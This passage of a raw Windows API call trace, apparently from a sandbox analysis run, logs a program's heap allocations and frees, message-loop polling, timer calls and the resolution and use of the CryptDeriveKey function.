lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.216] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.216] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0259.216] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.218] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.218] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0259.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0259.219] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9ed0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0259.219] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.220] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0259.220] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.220] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0259.220] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0259.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.221] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0259.221] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.222] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.222] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0259.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0259.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0259.223] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0259.223] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0259.224] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0259.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0259.225] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0259.225] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0259.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0259.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0259.225] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0259.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0259.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0259.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0259.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0259.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0259.226] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0259.226] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0259.226] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0259.227] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0259.227] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0259.227] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0259.227] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0259.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0259.227] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0259.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0259.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0259.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0259.227] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0259.227] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0259.228] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0259.228] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0259.228] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0259.228] RtlAllocateHeap 